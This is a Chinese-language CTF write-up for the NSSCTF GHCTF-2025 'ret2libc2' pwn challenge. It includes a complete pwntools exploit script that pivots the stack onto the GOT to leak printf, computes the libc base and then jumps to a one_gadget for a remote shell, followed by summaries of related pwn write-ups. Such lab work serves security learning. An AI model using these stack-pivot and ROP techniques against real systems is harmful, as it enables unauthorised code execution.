NSSCTF-GHCTF-2025-ret2libc2 题解

Created2026-02-25|Updated2026-02-25|NSSCTF 题解

|Post Views:

题目

checksec

这是什么鸭

vmmap

这是什么鸭

这里的 0x3fe000 在远端貌似不存在，被坑了，，，

IDA

main

这是什么鸭

func

这是什么鸭

栈溢出漏洞

got

这是什么鸭

onegadget

这是什么鸭

这是什么鸭

需要用 gadget 操纵寄存器

攻击思路

第一次栈迁移到 got 上 leak 出 printf 的地址以获取 libc 基址

第二次栈迁移为 onegadget 执行提供栈空间

exp

from pwn import *
from onegadget_selector import *

context.log_level = 'debug'
context.arch = 'amd64'
context.terminal = ['tmux', 'splitw', '-h']

debug = 0

if debug:
	io = process('./pwn_patched')
else:
	io = remote('node1.anna.nssctf.cn', 29246)

again_addr = 0x401223
got_hijack = 0x404030
rw_addr = 0x404300
pop_rsi_ret = 0x2be51
pop_rdx_ret = 0x170337

def attack():
	payload = b'A' * 0x30 + p64(got_hijack) + p64(again_addr)
	io.sendafter(b'magic\n', payload)
	printf = u64(io.recv(6).ljust(8, b'\x00'))
	log.info(f'printf = {hex(printf)}')
	libc = ELF('./libc.so.6')
	libc_base = printf - libc.symbols['printf']
	log.info(f'libc_base = {hex(libc_base)}')
	onegadget = select_onegadgets(libc.path) + libc_base
	pop_rsi_ret_addr = pop_rsi_ret + libc_base
	pop_rdx_ret_addr = pop_rdx_ret + libc_base
	payload = b'A' * 0x30 + p64(rw_addr) + p64(pop_rsi_ret_addr) + p64(0) + p64(pop_rdx_ret_addr) + p64(0) + p64(onegadget)
	io.sendafter(b'magic\n', payload)
	io.interactive()

attack()

Author: RatherHard

Link: https://www.ratherhard.com/post/NSSCTF/GHCTF-2025-ret2libc2.html

Copyright Notice: All articles on this blog are licensed under CC BY-NC-SA 4.0 unless otherwise stated.

pwn 栈迁移 NSSCTF ret2libc onegadget

Related Articles

NSSCTF-西湖论剑-2022-babycalc 题解

题目题目链接 IDA main calc 有一个 buf 相关的 off_by_null 以及由 i 操纵的 off_by_one ，无其余栈溢出漏洞因此考虑在原栈上做短程迁移以执行 rop 链要解一个 16 元方程组，图中有解出结果 got 用于泄露 libc 版本 stack 攻击思路在原栈上做短程迁移以执行 rop 链，注意要在 rop 链前面布置足够长的 ret sled 以提高命中率在正式攻击前先利用 got 表中信息泄露 libc 版本并获取 libc 正式攻击在两次读入内解决，两次均使用短程迁移第一次读入泄露 libc 基址，并返回到 main 的开始，这是因为我们需要连续两次 push rbp 支撑后面的连续两次 leave ret 使得栈迁移不会崩溃第二次 ret2libc 执行 system("/bin/sh") 即可运行时要多尝试几次 exp 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748...

NSSCTF-CISCN-2021-silverwolf 题解

题目题目链接 checksec 全开 IDA main 菜单题 initbuf 有沙箱，需要 orw allocate 同一时间只能掌控一个 chunk ，最大为 0x78 edit show 用于 leak delete 有 UAF 攻击思路挺棘手的，这道题目没有任何 leak pie 和 leak stack 的手段，只能 leak libc 和 leak heap 利用 UAF 和 tcache 机制我们可以轻松 leak heap ，并把 tcache_pthread_struct 扔进 unsorted_bin 以 leak libc ，同时还可以保留 tcache_pthread_struct 的写入权限劫持到 tcache_pthread_struct 后有一个好处：我们获得了 tcache_entries 的控制权，这意味着我们可以轻松指定下一次指定大小的 chunk 的分配地址，这有利于我们布置 rop 链以及接下来的 setcontext 技巧由于我们没办法直接劫持程序流程，而且要实现 orw 的话直接劫持 free_hook 不够（参...

NSSCTF-CISCN-2022-house_of_cat 题解

题目题目链接 checksec seccomp 只能 orw ，但是限制 read 的 fd 为 0 ，于是可以先 close(0) 再 orw IDA main handle_command parse_command 需要逆向解析出指令格式 execute_command menu 套一层指令解析的菜单题 add 只能申请 largerequest 0x420~0x470 ，放入 largebin 的话， 0x420~0x430 一个 bin ， 0x440~0x470 一个 bin edit edit 限制为两次，只能写 0x30 show 用于 leak delete 有 UAF 攻击思路先分析出命令格式： COMMAND | r00tQWB QWXFarg 然后发现要 login 成为管理员，再 cat 拿菜单 12LOGIN | r00tQWB QWXFadminCAT | r00tQWB QWXF\xff 之后就是堆题只能申请固定范围内的 largebin ，考察 largebin attack 技巧，而 edit_count 的限制让...

NSSCTF-强网杯-2022-devnull 题解

题目题目链接 vmmap 0x3fe000 处为 rw 之后 0x404000 会变成只读 IDA main vuln fgets 最多读取 n-1 个字节，最后一个字节会被设置为 \x00 有关于 fgets 的 off_by_null ，可将 fd 设置为 0 ，为标准输入流的文件描述符，从而启用下方的 read close(1) 会关闭标准输出流，之后不会有回显，但标准错误流还在 mywrite mprotect 设置 0x404000 为只读关于 mprotect 有一个坑：其地址必须对齐 0x1000 gadget 用于操纵 rax 攻击思路栈迁移难度不高考虑用 mprotect 开 rwx 区域用于写入 shellcode ，但这需要将 rdx 设置为 7 ，这一点利用 mywrite("Thanks\n"); 刚好可以实现然后利用 gadget 操纵 rax 以间接操纵 rdi 即可完成 mprotect 的调用（注意对齐 0x1000），然后写入 shellcode 即可吐槽 tnnd 为什么不给 libc 版本，，，本...

BUUCTF-NewStarCTF-2023-orwrop 题解

题目题目链接 checksec 有 canary 保护 IDA 有沙箱，考虑 orw 可利用格式化字符串漏洞泄露 canary 然后发现 mmap 开了一个 rwx 区域考虑栈迁移和 ret2shellcode 我们可以在第一次溢出时迁移 rbp 并再次调用溢出漏洞，然后由于 buf 的写入是以 rbp 为基准的，所以在第二次溢出时栈已迁移，可以直接在 rwx 段上布局 shellcode 实现 orw exp 123456789101112131415161718192021222324252627282930313233343536from pwn import *context.log_level = 'debug'context.arch = 'amd64'elf = ELF('ezorw')io = process('./ezorw') fmt = b'%11$p'io.recvuntil(b'sandbox\n')io.sendline(fm...

BUUCTF-rootersctf_2019_srop 题解

题目题目链接 checksec vmmap 注意到 0x402000 开始有 rw 权限，在没法泄露栈地址时考虑栈迁移到上面 IDA 代码很简洁，有一个栈溢出漏洞，且有 pop rax; syscall; leave; retn; gadget ，很方便进行 srop 思路考虑利用 srop 与栈迁移，在 0x402000 处布局栈： 1234567+-------------------+| ret2gadget | 0x402010 (rsp)+-------------------+| rbp | 0x402008+-------------------+| "/bin/sh\x00" | 0x402000+-------------------+ 利用 gadget 调用 execve syscall 即可 exp 1234567891011121314151617181920212223242526272829303132333435363738394041from pwn i...